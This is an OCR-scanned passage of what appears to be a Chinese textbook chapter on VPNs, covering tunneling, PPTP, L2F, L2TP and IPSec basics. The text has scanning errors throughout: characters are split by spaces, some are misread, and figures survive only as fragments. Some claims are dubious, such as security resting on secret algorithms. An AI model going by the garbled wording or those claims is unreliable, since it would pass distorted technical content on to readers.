加 密 隧道 






站 点 2 


内 联网 











站 点 到 站 点 


网 络 访问 
服务 器 


VPN 网 关 





远程 用 户 


外 联网 


6-7 Extranet VPN 示意 图 


VPN 是 对 Intranet 的 扩展 , 它 可 以 帮助 远程 用 户 、 公 司 分 支 机 构 .商业 伙伴 及 供应 商 同 
公司 的 Intranet 建立 可 信 的 安全 连接 ,并 保证 数据 的 安全 传输 。VPN 可 用 于 不 断 增长 的 移 
动用 户 的 全 球 因 特 网 接 人 ,以 实现 安全 连接 ; 可 用 于 实现 企业 网 站 之 间 安 全 通信 的 虚拟 专 
用 线路 ,可 用 于 有 效 地 连接 到 商业 伙伴 和 用 户 的 安全 外 联网 VPN。 一 家 企业 可 以 同时 提供 
3 种 VPN 服务 ,如 图 6-8 所 示 。 
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6-8 ”企业 提供 的 VPN 服务 示意 图 


6.3 VPN 的 功能 特性 


VPN 系统 的 功能 特性 可 以 概括 为 以 下 几 个 主要 方面 。 

1. 安全 保障 

实现 VPN 的 技术 和 模式 很 多 ,但 所 有 的 VPN 均 应 保证 通过 公用 网 络 平台 传输 数据 的 
专用 性 和 安全 性 。 在 面向 非 连接 的 公用 IP 网 络 上 建立 一 个 逻辑 的 、 点 对 点 的 连接 , 称 为 建 
立 一 个 隧道 ,可 以 利用 加 密 技术 对 经 过 隧道 传输 的 数据 进行 加 密 , 以 保证 数据 仅 被 指定 的 发 
送 者 和 接收 者 了 解 ,从 而 保证 了 数据 的 私有 性 和 安全 性 。 在 安全 性 方面 ,由 于 VPN 直接 构 
建 在 公用 网 上 ,其 安全 问题 也 更 为 突出 。 企 业 必须 确保 其 VPN 上 传送 的 数据 不 被 攻击 者 
窥视 和 算 改 ,并 且 要 防止 非法 用 户 对 网 络 资源 或 私有 信息 的 访问 。Extranet VPN 将 企业 网 
扩展 到 合作 伙伴 和 客户 ,对 安全 性 提出 了 更 高 的 要 求 。 

2. 服务 质量 保证 

VPN 为 企业 数据 提供 不 同等 级 的 QoS, 不 同 的 用 户 和 业务 对 QoS 的 要 求 差别 较 大 。 
对 于 移动 办 公用 户 ,提供 广泛 的 连接 和 覆盖 性 是 保证 VPN 服务 的 一 个 重要 因素 ; 对 于 拥有 
众多 分 支 机 构 的 专线 VPN 网 络 , 交 互 式 的 内 部 企业 网 应 用 则 要 求 网 络 能 提供 良好 的 稳定 
性 ; 对 于 视频 等 其 他 应 用 则 对 网 络 提 出 了 明确 的 要 求 ,如 网 络 时 延 及 误 码 率 等 。 所 有 以 上 
网 络 应 用 均 要 求 网 络 根据 需要 提供 不 同等 级 的 QoS. 

在 网 络 优化 方面 ,构建 VPN 的 另 一 重要 需求 是 充分 利用 广域网 资源 ,为 重要 数据 提供 
可 靠 的 带宽 。 广 域 网 流量 的 不 确定 性 使 其 带宽 的 利用 率 很 低 , 在 流量 高 峰 时 易 引 起 网 络 阻 
塞 ,产生 网 络 瓶 颈 , 使 实时 性 要 求 高 的 数据 得 不 到 及 时 发 送 ; 而 在 流量 低谷 时 又 造成 大 量 的 
带宽 空闲 。QosS 通过 流量 预测 与 流量 控制 策略 ,按照 优先 级 分 配 带宽 资源 ,实现 带宽 管理 ， 
使 各 类 数据 被 合理 地 先后 发 送 , 预 防 阻塞 发 生 。 
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3. 可 扩充 性 和 灵活 性 

VPN 必须 能 够 支持 通过 Intranet 和 Extranet 的 任何 类 型 的 数据 流 ,方便 增加 新 的 节 
点 ,支持 多 种 类 型 的 传输 介质 ,可 以 满足 同时 传输 语音 、 图 像 和 数据 等 新 应 用 对 高 质量 传输 
以 及 带宽 增加 的 需求 。 

4. 可 管理 性 

从 用 户 角度 和 运营 商 角度 看 ,VPN 要 求 企业 将 其 网 络 管理 功能 从 局 域 网 无 缝隙 地 延伸 
到 公用 网 ,甚至 是 客户 和 合作 伙伴 ; 可 以 将 一 些 次 要 的 网 络 管理 任务 交 给 服务 提供 商 去 完 
成 ,企业 自己 仍 需要 完成 许多 网 络 管理 任务 。VPN 管理 目标 是 减 小 网 络 风险 ,使 其 具有 高 
扩展 性 、 经 济 性 ,高 可 靠 性 等 , VPN 管理 内 容 是 安全 管理 ,设备 管理 ,配置 管理 .ACL 管理 、 
QoS 管理 等 。 

5. 降低 成 本 

VPN 利用 现 有 的 Internet 或 其 他 公共 网 络 的 基础 设施 为 用 户 创建 安全 隧道 ,不 需要 专 
门 的 租用 线路 ,节省 了 专线 的 租金 。 如 果 是 采用 远程 拨号 进入 内 部 网 络 , 访 问 内 部 资源 , 需 
要 长 途 话费 ; 而 采用 VPN 技术 ,只 需 氢 入 当地 的 ISP 就 可 以 安全 地 接 入 内 部 网 络 ,这 样 也 
节省 了 线路 话费 。 


6.4 VPN 的 原理 与 协议 


VPN 技术 非常 复杂 ,但 实现 VPN 的 主要 技术 及 相关 协议 已 经 成 熟 ,尤其 以 L2TP、 
IPSec 和 SSL 协议 应 用 最 广泛 。VPN 使 用 3 个 方面 的 技术 保证 通信 的 安全 性 , 即 身份 验 
证 、 隧 道 协议 .数据 加 密 。 

1. VPN 的 一 般 验 证 流程 

(1) 客户 机 向 VPN 服务 器 发 出 请 求 ,VPN 服务 器 响应 请 求 并 向 客户 机 发 出 身份 质询 。 

(2) 客户 机 将 加 密 的 响应 信息 发 送 到 VPN 服务 器 。 

(3) 如 果 账 户 有 效 ,VPN 服务 器 将 检查 该 用 户 是 否 具有 远程 访问 权限 。 

(4) 如 果 该 用 户 拥 有 远程 访问 的 权限 ,VPN 服务 器 接受 此 连接 。 

(5) 在 身份 验证 过 程 中 产生 的 客户 机 和 服务 器 公有 密 钥 将 用 来 对 数据 进行 加 密 。 

身份 认证 技术 ,是 在 计算 机 网 络 中 确认 操作 者 身份 的 过 程 而 产生 的 解决 方法 。 计 算 机 
网 络 世 界 中 一 切 信息 包括 用 户 的 身份 信息 都 是 用 一 组 特定 的 数据 来 表示 的 ; 计算 机 只 能 识 
别 用 户 的 数字 身份 ,对 用 户 的 授权 也 是 针对 用 户 数字 身份 的 授权 ; 如 何 保证 以 数字 身份 进 
行 操作 的 操作 者 就 是 这 个 数字 身份 合法 拥有 者 , 即 保证 操作 者 的 物理 身份 与 数字 身份 相对 
应 。 为 了 解决 这 个 问题 ,身份 认证 技术 作为 防护 网 络 资产 的 第 一 道 关 口 , 有 着 举足轻重 的 
作用 。 

2. 隧道 

(1) VPN 的 核心 是 被 称 为 “隧道 (Tunneling)” 的 技术 。 

(2) 隧道 技术 是 一 种 通过 使 用 互联 网 络 的 基础 设施 在 网 络 之 间 传 递 数据 的 方式 。 
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(3) 使 用 隧道 传递 的 数据 (或 负载 ) 可 以 是 不 同 协议 的 数据 帧 或 包 , 隧 道 协 议 将 这 些 其 
他 协议 的 数据 帧 或 包 重 新 封装 在 新 的 包头 中 发 送 。 

(4) 被 封装 的 数据 包 在 公共 互联 网 络 上 传递 时 所 经 过 的 逻辑 路 径 称 为 隧道 ,如 图 6-9 
所 示 。 


隧道 终点 









































数据 包 F- 数据 包 


服务 器 


务 器 
隧道 中 的 数据 包 隧道 
图 6-9 隧道 示意 图 


隧道 技术 是 一 种 通过 使 用 互联 网 络 的 基础 设施 在 网 络 之 间 传 递 数据 的 方式 。 使 用 隧道 
传递 的 数据 (或 负载 ) 可 以 是 不 同 协议 的 数据 帧 或 包 。 隧 道 协议 将 这 些 其 他 协议 的 数据 帧 或 
包 重 新 封装 在 新 的 包头 中 发 送 。 新 的 包头 提供 了 路 由 信息 ,从 而 使 封装 的 负载 数据 能 够 通 
过 互联 网 络 传递 。 

被 封装 的 数据 包 在 隧道 的 两 个 端点 之 间 通 过 公共 互联 网 络 进行 路 由 。 被 封装 的 数据 包 
在 公共 互联 网 络 上 传递 时 所 经 过 的 逻辑 路 径 称 为 隘 道 。 一 旦 到 达 网 络 终点 ,数据 将 被 解 包 
并 转发 到 最 终 目 的 地 。 隧 道 技术 是 指 包括 数据 封装 .传输 和 解 包 在 内 的 全 过 程 。 

3. 加 密 

加 密 的 基本 思想 ,在 协议 栈 的 任意 层 对 数据 或 报 文 头 进行 加 密 , 由 于 所 选 算法 极为 保 
密 , 故 难 以 破解 ,从 而 有 效 保护 传输 的 信息 。 考 虑 到 该 技术 已 经 成 熟 且 广 泛 应 用 于 诸多 领域 
的 信息 加 密 传输 ,VPN 可 直接 利用 现 有 加 密 技术 。 

由 于 VPN 实际 上 是 通过 软件 实现 的 技术 ,因而 VPN 加 密 的 载体 也 是 多 方面 的 ,包括 
路 由 器 (路 由 器 实现 VPN 功能 ) 防火墙 (防火 墙 实 现 VPN 功能 ) .专用 VPN 硬件 (加 密 通 
过 硬件 实现 ,提高 安全 效率 ) VPN 加 密 技术 发 展 趋势 是 实现 端 到 端的 安全 ,这 样 才能 真正 
确保 完全 加 密 。 


6.4.1 实现 VPN 的 隧道 技术 


为 了 能 在 公 网 中 形成 企业 专用 的 链 路 网 络 , VPN 采用 了 Tunneling 技术 ,模拟 点 到 点 
连接 技术 ,依靠 ISP 和 其 他 的 网 络 服务 提供 商 在 公 网 中 建立 自己 专用 的 Tunneling, 让 数据 
包 通 过 隧道 传输 。 

网 络 隧道 技术 ,是 利用 一 种 网 络 协议 传输 另 一 种 网 络 协议 ,也 就 是 将 原始 网 络 信息 进行 
再 次 封装 ,并 在 两 个 端点 之 间 通 过 公共 互联 网 络 进行 路 由 ,从 而 保证 网 络 信息 传输 的 安全 
性 。 它 主要 利用 网 络 隧道 协议 来 实现 这 种 功能 ,具体 包括 第 二 层 隧道 协议 和 第 三 层 隧道 
协议 。 

第 二 层 隧道 协议 ,在 链 路 层 进行 , 先 把 各 种 网 络 协议 封装 到 PPP 包 中 ,再 把 整个 数据 包 
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装 和 人 隧道 协议 中 ,这 种 经 过 两 层 封装 的 数据 包 由 第 二 层 协 议 进 行 传输 。 第 二 层 隧 道 协议 有 
以 下 几 种 , 即 PPTP(Point-to-Point Tunneling Protocol) .L2F(Layer 2 Forwarding) ,L2TP 
(Layer 2 Tunneling Protocol) 。 

第 三 层 隧道 协议 ,在 网 络 层 进行 ,把 各 种 网 络 协议 直接 装 入 隧道 协议 中 ,形成 的 数据 包 
依靠 第 三 层 协议 进行 传输 。 第 三 层 隧道 协议 有 以 下 几 种 : IPSec(IP Security), 这 是 目前 最 
常用 的 VPN 解决 方案 ; GRE(General Routing Encapsulation). 

隧道 技术 包括 了 数据 封装 .传输 和 解 包 在 内 的 全 过 程 。 

封装 是 构建 隧道 的 基本 手段 , 它 使 得 IP 隧道 实现 了 信息 隐蔽 和 抽象 。 封 装 器 建立 封装 
报头 ,并 将 其 追加 到 纯 数据 包 的 前 面 。 当 封装 的 数据 包 到 达 解 包 器 时 ,封装 报头 被 转换 回 纯 
报头 ,数据 包 被 传送 到 目的 地 。 

隧道 的 封装 具有 以 下 特点 : 源 实体 和 目的 实体 不 知道 任何 隧道 的 存在 ; 在 隧道 的 两 个 
端点 使 用 该 过 程 ,需要 封装 器 和 解 包 器 两 个 新 的 实体 ; 封装 器 和 解 包 器 必须 相互 知晓 ,但 不 
必 知 道 在 它们 之 间 的 网 络 上 的 任何 细节 。 


6.4.2 PPTP 协议 


点 对 点 隧道 协议 (PPTP) 是 常用 的 协议 ,主要 是 因为 微软 的 服务 器 操作 系统 占有 很 大 
的 市 场 份额 。PPTP 是 点 对 点 协议 (PPP) 的 扩展 ,而 PPP 是 为 在 串 行 线路 上 进行 所 入 访问 
而 开发 的 。PPTP 在 Windows 2000 中 已 完全 实现 , 它 将 PPP 帧 封装 成 IP 数据 报 , 以 便 在 
基于 IP 的 互联 网 上 传输 。 

PPTP 允许 对 多 协议 通信 进行 加 密 , 然 后 封装 在 IP 标 头 中 ,以 通过 IP 网 络 发 送 。 
PPTP 可 以 用 于 远程 访问 连接 和 站 点 到 站 点 的 VPN 连接 ,使 用 Internet 作为 VPN 的 公用 
网 络 时 ,PPTP 服务 器 是 启用 PPTP 的 VPN 服务 器 ,一 个 接口 在 Internet 上 , 另 一 个 接口 在 
Intranet 上 。 

PPTP 将 PPP 帧 封装 在 IP 数据 报 中 ,以 便 通 过 网 络 传输 。PPTP 使 用 TCP 连接 进行 
隧道 管理 ,使 用 修订 版 的 通用 路 由 封装 (GRE) 封 装 隧道 数据 的 PPP 帧 。 封 装 的 PPP 帧 的 
有 效 负 载 可 以 加 密 .压缩 或 加 密 并 压缩 。 图 6-10 所 示 为 包含 IP 数据 报 的 PPTP 数据 包 的 
结构 。 





已 加 密 
1 Y 
IP 标 头 | GRE 标 头 | PPP 标 头 PPP 负 载 (IP 数 据 报 ) 














PPP 帧 








6-10 PPTP 数据 包 结构 示意 图 


可 使 用 MS-CHAP v2 sk EAP-TLS 身份 验证 进程 生成 的 加 密 密 钥 ,通过 微软 点 对 点 加 
密 (MPPE) 对 PPP 帧 进行 加 密 。VPN 客户 端 只 有 使 用 MS-CHAP v2 或 EAP-TLS 身份 验 
证 协议 才能 对 PPP 帧 的 有 效 负载 进行 加 密 。PPTP 利用 基础 PPP 加 密 并 封装 以 前 加 密 的 
PPP 帧 。 
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6.4.3 L2F 协议 


L2F 是 Cisco 公司 提出 的 隧道 技术 。 作 为 一 种 传输 协议 ,L2F 支持 拨号 接 人 服务 器 ,将 
拨号 数据 流 封 装 在 PPP 帧 内 通过 广域网 链 路 传送 到 L2F 服务 器 (路 由 器 )。L2F 服务 器 把 
数据 包 解 包 之 后 重新 注入 网 络 。 与 PPTP 和 L2TP 不 同 ,L2F 没有 确定 的 客户 方 。 应 当 注 
意 ,L2F 只 在 强制 隧道 中 有 效 。 


6.4.4 L2TP 协议 


根据 IETF 提供 的 设计 标准 协议 的 建议 ,微软 和 Cisco 两 公司 设计 了 第 二 层 隧道 协议 
(L2TP)。 后 来 ,IETF 采纳 这 一 协议 ,现代 的 L2TP 结合 了 PPTP 和 Cisco 的 L2F 协议 。 

1. L2TP 协议 的 基本 原理 

L2TP 是 一 种 基于 PPP 的 二 层 隧 道 协议 。 在 由 L2TP 构建 的 VPN 中 ,有 两 种 类 型 的 
服务 器 ,一 种 是 L2TP 访问 集中 器 LAC(L2TP Access Concentrator) , 它 是 附属 在 网 络 上 的 
具有 PPP 端 系统 和 L2TP 协议 处 理 能 力 的 设备 ,LAC 是 一 个 网 络 接 人 服务 器 ,为 用 户 提供 
网 络 接 入 服务 ; 另 一 种 是 L2TP 网 络 服务 器 LNS(L2TP Network Server) ,是 PPP 端 系 统 
上 用 于 处 理 L2TP 协议 服务 器 端 部 分 的 软件 。 

在 LNS 和 LAC 之 间 存 在 两 种 类 型 的 连接 : 一 种 是 Tunneling 连接 , 它 定 义 了 一 个 
LNS 和 LAC 对 ; 另 一 种 是 会 话 (Session) 连 接 , 它 复 用 在 隧道 连接 之 上 ,用 于 表示 承载 在 隧 
道 连 接 中 的 每 个 PPP 会 话 过 程 。 

L2TP 连接 的 维护 以 及 PPP 数据 的 传送 都 是 通过 L2TP 消息 的 交换 来 完成 的 ,L2TP 
消息 可 以 分 为 两 种 类 型 ,一 种 是 控制 消息 , 另 一 种 是 数据 消息 。 控 制 消息 用 于 隧道 连接 和 会 
话 连 接 的 建立 与 维护 ,数据 消息 用 于 承载 用 户 的 PPP 会 话 数据 包 。 这 些 消息 都 通过 UDP 
的 1701 端口 承载 于 TCP/IP 之 上 。 

2. L2TP 协议 的 网 络 组 件 

在 L2TP 构建 的 VPN 中 ,网 络 组 件 包 括 以 下 3 个 部 分 。 

(1) 远 端 系统 ,是 要 接 和 人 V PDN 网 络 的 远 地 用 户 和 远 地 分 支 机 构 ,通常 是 一 个 拨号 用 
户 的 主机 或 私有 网 络 的 一 台 路 由 设备 。 

(2) LAC, 是 附属 在 交换 网 络 上 的 具有 PPP 端 系统 和 LTP 协议 处 理 能 力 的 设备 , 通 
常 是 一 个 当地 ISP 的 NAS, 用 于 为 PPP 类 型 的 用 户 提 供 接 人 服务 。LAC 位 于 LNS 和 远 端 
系统 之 间 ,用 于 在 LNS 和 远 端 系统 之 间 传 递 信息 包 。 它 把 从 远 端 系统 收 到 的 信息 包 按 照 
L2TP 协议 进行 封装 并 送 往 LNS, 同 时 也 将 从 LNS 收 到 的 信息 包 进 行 解 封装 并 送 往 远 端 系 
统 。LAC 与 远 端 系统 之 间 采 用 本 地 连接 或 PPP SERE. VPN 应 用 中 通常 为 PPP 链 路 。 

G) LNS, 既 是 PPP 端 系统 ,又 是 L2TP 协议 的 服务 器 端 ,通常 作为 一 个 企业 内 部 网 的 
边缘 设备 。LNS 作为 L2TP 隧道 的 另 一 侧 端 点 ,是 LAC 的 对 端 设备 ,也 是 LAC 进行 隧道 
传输 的 PPP 会 话 的 逻辑 终止 端点 。 通 过 在 公 网 中 建立 L2TP 隧道 ,将 远 端 系统 的 PPP 连接 
的 另 一 端 由 原来 的 LAC 在 逻辑 上 延伸 到 了 企业 网 内 部 的 LNS, 

L2TP 是 PPTP 和 L2F 的 组 合 ,微软 实现 的 L2 TP 依靠 IPSec 传输 模式 来 提供 加 密 服 
务 。L2TP 和 IPSec 的 组 合 称 为 L2TP/IPSec, VPN 客户 端 和 VPN 服务 器 均 支 持 L2TP 和 
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IPSec, VPN 客户 端 支持 内 置 在 Windows XP 等 远程 访问 客户 端 中 ,VPN 服务 器 支持 内 置 
在 Windows Server 2003 系列 的 成 员 中 。 


3. L2TP 协议 的 结构 


图 6-11 描述 了 控制 通道 以 及 PPP 帧 和 数据 通道 之 间 的 关系 。PPP 帧 在 不 可 靠 的 
L2TP 数据 通道 上 进行 传输 ,控制 消息 在 可 靠 的 L2TP 控制 通道 内 传输 。 

















PPP 帧 数 
L2TP 数 据 信息 | L2TP 控 制 信息 
L2TP 数 据 信道 | L2TP 控 制 信道 
(不 可 信赖 的 ) (可 信赖 的 ) 
分 组 交换 数据 传输 网 











6-11 L2TP 协议 结构 示意 图 


图 6-12 描述 了 LAC 与 LNS 之 间 的 L2TP 数据 报 文 的 封装 结构 。 通 常 L2TP 数据 以 
UDP 报 文 的 形式 发 送 ; L2TP 注册 了 UDP1701 端口 ,但 是 这 个 端口 仅 用 于 初始 的 隧道 建立 
过 程 中 ; L2TP 隧道 发 起 方 任 选 一 个 空闲 的 端口 向 接收 方 的 1701 端口 发 送 报 文 ; 接收 方 收 
到 报 文 后 ,也 任 选 一 个 空闲 的 端口 ,给 发 送 方 的 指定 端口 回 送 报 文 。 至 此 ,双方 端口 选 定 ,并 
在 隧道 保持 连通 的 时 间 段 内 不 再 改变 。 

PPP ipi IP 数据 报 ) 使 用 L2TP 标 头 和 UDP 标 头 封 装 。 包 含 IP 数据 报 的 L2TP 数据 
包 的 结构 ,如 图 6-12 所 示 。 








IP 标 头 | UDP 标 头 | L2TP 标 头 | PPP 标 头 | PPP 负 载 (IP 数 据 报 ) 
h PPP 帧 
» L2TP 帧 - 


UDP 帧 

















6-12. L2TP 数据 包 结构 示意 图 


L2TP 使 用 以 下 两 种 信息 类 型 , 即 控制 信息 和 数据 信息 。 控 制 信息 用 于 隧道 和 呼叫 的 
建立 ,维持 和 清除 ,数据 信息 用 于 封装 隧道 所 携带 的 PPP Bü; 控制 信息 利用 LZTP 中 的 一 个 
可 靠 控制 通道 来 确保 发 送 。 当 发 生 包 丢失 时 ,不 转发 数据 信息 。 应 用 L2TP 协议 所 构建 的 
虚拟 专用 网 络 如 图 6-13 所 示 o 
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图 6-13 L2TP 构建 的 VPN 示意 图 
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4. L2TP 构建 VPN 的 优势 

CD 灵活 的 身份 验证 机 制 以 及 高 度 的 安全 性 。L2TP 是 基于 PPP 的 , 它 继承 了 PPP 的 
所 有 安全 特性 ,并且 还 对 隧道 端点 进行 验证 ,使 得 通过 L2TP 传输 的 数据 难以 被 攻击 ; 根据 
特定 的 网 络 安全 要 求 ,还 可 以 在 L2TP 之 上 采用 隧道 加 密 、 端 对 端 数 据 加 密 或 应 用 层 数 据 加 
密 等 来 提高 数据 的 安全 性 。 

(2) 内 部 地 址 分 配 支持 。LNS 可 以 放置 于 企业 网 的 防火 墙 之 后 , 它 可 以 对 于 远 端 用 户 
的 地 址 进行 动态 的 分 配 和 管理 ,可 以 支持 DHCP 和 私有 地 址 应 用 。 远 端 用 户 所 分 配 的 地 址 
不 是 Internet 地 址 而 是 企业 内 部 的 私有 地 址 ,这 样 方便 了 地 址 的 管理 并 可 以 增加 安全 性 。 

(3) 网 络 计 费 的 灵活 性 。 可 以 在 LAC 和 LNS 两 处 同时 计 费 , 即 ISP 处 和 企业 处 。 
L2TP 提供 数据 传输 的 出 入 包 数 、 字 节 数 及 连接 的 起 始 、 结 束 时 间 等 计 费 数据 ,可 以 根据 这 
些 数据 方便 地 进行 网 络 计 费 。 

(4) 可 靠 性 。L2TP 协议 可 以 支持 备份 LNS, 当 一 个 主 LNS 不 可 达 之 后 ,LAC 可 以 重 
新 与 备份 LNS 建立 连接 ,这 样 增加 了 VPN 服务 的 可 靠 性 和 容错 性 。 

(5) 统一 的 网 络 管理 。L2TP 协议 将 很 快 地 成 为 标准 的 RFC 协议 ,有 关 L2TP 的 标准 
MIB 也 将 很 快 制定 ,这 样 可 以 统一 地 采用 SNMP 网 络 管理 方案 进行 方便 的 网 络 维护 与 
管理 。 








6.4.5 IPSec 协议 


1. IPSec 协议 的 基本 原理 

Internet 协议 安全 性 (IPSec) 是 一 种 开放 标准 的 框架 结构 ,通过 使 用 加 密 的 安全 服务 以 
确保 在 Internet. 上 进行 保密 而 安全 的 通信 。 

L2TP 等 都 没有 解决 隧道 加 密 和 数据 加 密 的 问题 。IPSec 协议 把 多 种 安全 技术 集合 到 
一 起 ,可 以 建立 一 个 安全 可靠 的 隧道 。 这 些 技术 包括 : Diffie Hellman 密 钥 交 换 技 术 ， 
DES.RC4.IDEA 数据 加 密 技术 ; 哈 希 算法 HMAC、MD5、SHA; 数字 签名 技术 等 。 

IPSec 是 一 套 协 议 包 而 不 是 一 个 单个 的 协议 ,这 一 点 对 于 认识 IPSec 很 重要 。 协 议 包 主 
要 包括 IKE 互联 网 密 钥 交换 .IPSec 协议 .AH 验证 包头 .ESP 加 密 数据 等 文件 。 

IPSec 给 出 了 应 用 于 IP 层 上 网 络 数据 安全 的 整套 用 于 认证 .私有 性 和 完整 性 的 标准 协 
议 , 包 括 认 证 协议 (Authentication Header, AH)、 封 装 安全 载荷 协议 (Encapsulating 
Security Payload, ESP) 、 密 钥 管 理 协议 (Internet Key Exchange,IKE) 和 用 于 认证 及 加 密 的 
算法 如 DES IDEA 等 。 

IPSec 是 一 个 第 三 层 VPN 协议 标准 ,规定 了 如 何在 对 等 层 之 间 选 择 安全 协议 、 安 全 算 
法 和 密 钥 交换 ,向 上 层 提供 访问 控制 .数据 源 验证 ,数据 加 密 等 安全 服务 ; 各 协议 之 间 的 关 
系 如 图 6-14 所 示 。 

CD AH 为 IP 数据 包 提 供 无 连接 的 数据 完整 性 和 数据 源 身 份 认证 ,同时 具有 防 重 放 攻 
击 的 能 力 。 数 据 完整 性 校 验 通过 消息 认证 码 ( 如 MD5) 产 生 的 校 验 值 来 保证 ; 数据 源 身份 
认证 通过 在 待 认 证 的 数据 中 加 入 一 个 共享 密 钥 来 实现 ; AH 报头 中 可 以 防止 重 放 攻 击 。 

(2) ESP 为 IP 数据 包 提 供 数 据 的 保密 性 (通过 加 密 机 制 ) 、 无 连接 的 数据 完整 性 、 数 据 
源 身 份 认证 以 及 防 重 放 攻 击 保护 。 与 AH 相 比 ,数据 保密 性 是 ESP 的 新 增 功能 ,数据 源 身 
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6-14 IPSec 体系 结构 示意 图 


份 认证 .数据 完整 性 检验 以 及 重 放 保护 都 是 AH 可 以 实现 的 。 

(3) AH 和 ESP 可 以 单独 使 用 ,也 可 以 配合 使 用 。 通 过 这 些 组 合 模式 ,可 以 在 两 台 
机 、 两 台 安 全 网 关 ( 防 火 墙 和 路 由 器 ) 或 者 主机 与 安全 网 关 之 间 配置 多 种 灵活 的 安全 机 制 。 

(4) 解释 域 DOI 将 所 有 的 IPSec 协议 捆绑 在 一 起 ,是 IPSec 安全 参数 的 主要 数据 库 。 

(5) 密 钥 管理 包括 IKE 协议 和 安全 联盟 (SA) 等 部 分 。IKE 在 通信 系统 之 间 建 立 安 全 
联盟 ,提供 密 钥 管 理 和 密 钥 确 定 的 机 制 ,是 一 个 产生 和 交换 密 钥 材料 并 协调 IPSec 参数 的 框 
架 。IKE 将 密 钥 协商 的 结果 保留 在 SA 中 , 供 AH 和 ESP 以 后 通信 时 使 用 。 

AH 和 ESP 都 支持 两 种 模式 , 即 传输 模式 和 隧道 模式 。 

传输 模式 IPSec 主要 对 上 层 协 议 提供 保护 ,通常 用 于 两 个 主机 之 间 端 到 端的 通信 。 

隧道 模式 IPSec 提供 对 所 有 IP 包 的 保护 ,主要 用 于 安全 网 关 之 间 ,可 以 在 Internet. 上 
构成 VPN。 使 用 隧道 模式 ,在 防火 墙 之 后 内 部 网 的 一 组 主机 可 以 不 实现 IPSec 而 参加 安全 
通信 。 局 域 网 边界 的 防火 墙 上 的 IPSec 软件 会 建立 隧道 模式 SA ,主机 产生 的 未 保护 的 包 通 
过 隧道 连 到 外 部 网 络 。IPSec 提供 的 安全 业务 如 表 6-1 所 示 。 


表 6-1 IPSec 安全 业务 














协议 
安全 业务 
AH( 认 证 ) ESP( 加 密 ) ESP( 加 密 和 认证 ) 
访问 控制 v v v 
无 连接 数据 完整 性 v v 
数据 来 源 认证 v v 
对 重 发 数据 的 拒绝 v v v 
保密 性 v v 
有 限 流 业务 的 保密 性 v v 
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2. IPSec 协议 的 结构 

IPSec 包括 3 个 基本 协议 : AH 协议 为 IP 包 提供 信息 源 验证 和 完整 性 保证 ; ESP 协议 
提供 加 密 保证 ; ISAKMP 协议 提供 双方 交流 时 的 共享 安全 信息 。ESP 和 AH 都 有 相关 的 
一 系列 支持 文件 ,规定 了 加 密 和 认证 的 算法 。DOI 通过 一 系列 命令 .算法 、 属 性、 参数 来 连 
接 所 有 的 IPSec 组 文件 。 

IPSec 通过 端 对 端的 安全 性 来 提供 主动 的 保护 以 防止 专用 网 络 与 Internet 的 攻击 。 在 
通信 中 ,只 有 发 送 方 和 接收 方才 是 唯一 必须 了 解 IPSec 保护 的 计算 机 。IPSec 在 IP 层 实 现 ， 
因此 可 以 有 效 地 保护 各 种 上 层 协 议 ,并 为 各 种 安全 服务 提供 一 个 统一 的 平台 。IPSec 适用 
于 IPv4 和 IPv6。 

IPSec 基于 端 对 端的 安全 模式 ,在 源 IP 和 目标 IP 地 址 之 间 建 立信 任 和 安全 性 。 考 虑 认 
H IP 地 址 本 身 没 有 必要 具有 标识 ,但 IP 地 址 后 面 的 系统 必须 有 一 个 通过 身份 验证 程序 验 
证 过 的 标识 。 只 有 发 送 和 接收 的 计算 机 需要 知道 通信 是 安全 的 。 每 台 计 算 机 都 假定 进行 通 
信 的 媒体 不 安全 ,因此 在 各 自 的 终端 上 实施 安全 设置 。 该 模式 允许 为 下 列 企业 方案 成 功 部 
署 IPSec: LAN ,客户 端 /服务 器 和 对 等 网 络 ; WAN ,路 由 器 到 路 由 器 和 网 关 到 网 关 ; 远程 
访问 ,拨号 客户 机 和 从 专用 网 络 访问 Internet。 

通常 ,两 端 都 需要 IPSec 配置 ( 称 为 IPSec 策略 ) 来 设置 选项 与 安全 设置 ,以 允许 两 个 系 
统 对 如 何 保护 它们 之 间 的 通信 达成 协议 。Windows XP 和 Windows Server 2003 家 族 实 施 
IPSec 是 基于 IETF IPSec 工作 组 开发 的 业界 标准 。IPSec 相关 服务 部 分 是 由 Microsoft 与 
Cisco 共同 开发 。 

IPSec 提供 了 两 种 安全 机 制 , 即 认证 和 加 密 。 认 证 机 制 使 IP 通信 的 数据 接收 方 能 够 确 
认 数据 发 送 方 的 真实 身份 以 及 数据 在 传输 过 程 中 是 否 遭 算 改 ; 加 密 机 制 通过 对 数据 进行 编 
码 来 保证 数据 的 机 密 性 ,以 防 数据 在 传输 过 程 中 被 窃听 。AH 定义 了 认证 的 应 用 方法 ,提供 
数据 源 认 证 和 完整 性 保证 ; ESP 定义 了 加 密 和 可 选 认证 的 应 用 方法 ,提供 可 靠 性 保证 。 在 
实际 IP 通信 时 ,可 以 根据 实际 安全 需求 同时 使 用 这 两 种 协议 或 选择 使 用 其 中 的 一 种 。AH 
和 ESP 都 可 以 提供 认证 服务 ,不 过 AH 提供 的 认证 服务 要 强 于 ESP,IKE 用 于 密 钥 交换 。 

1) AH 协议 

AH 为 IP 通信 提供 数据 源 认证 、 数 据 完整 性 和 反 回 放 保 证 , 它 能 保护 通信 和 免 受 算 改 ,但 
不 能 防止 窃听 ,适合 用 于 传输 非 机 密 数 据 ,但 不 提供 数据 机 密 性 保护 。AH 的 工作 原理 是 在 
每 一 个 数据 包 上 添加 一 个 身份 验证 报头 。 此 报头 包含 一 个 带 密 钥 的 Hash 散 列 ,此 Hash fk 
列 在 整个 数据 包 中 计算 ,因此 对 数据 的 任何 更 改 将 致使 散 列 无 效 , 这 样 就 提供 了 完整 性 
保护 。 

IPSec 认证 头 是 一 个 用 于 提供 IP 数据 报 完整 性 .数据 源 认 证 和 可 选 的 抗 重 放 保护 的 机 
制 ,其 完整 性 是 保证 数据 包 不 被 无 意 的 或 恶意 的 方式 改变 ,认证 则 验证 数据 的 来 源 。AH 为 
IP 包 提供 尽 可 能 多 的 身份 认证 保护 ,认证 失败 的 包 将 被 丢弃 ,不 交 给 上 层 协 议 ,这 种 操作 方 
式 可 以 减少 拒绝 服务 攻击 成 功 的 机 会 。AH 提供 IP 头 认 证 ,也 可 以 为 上 层 协议 提供 认证 。 

(OD AH 协议 头 格式 。AH 头 结构 如 表 6-2 所 示 。 
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表 6-2 AH 头 
Wok 载荷 长 度 HE 
安全 参数 索引 SPICSecurity Parameters Index) 
序列 号 (Sequence Nunmber) 
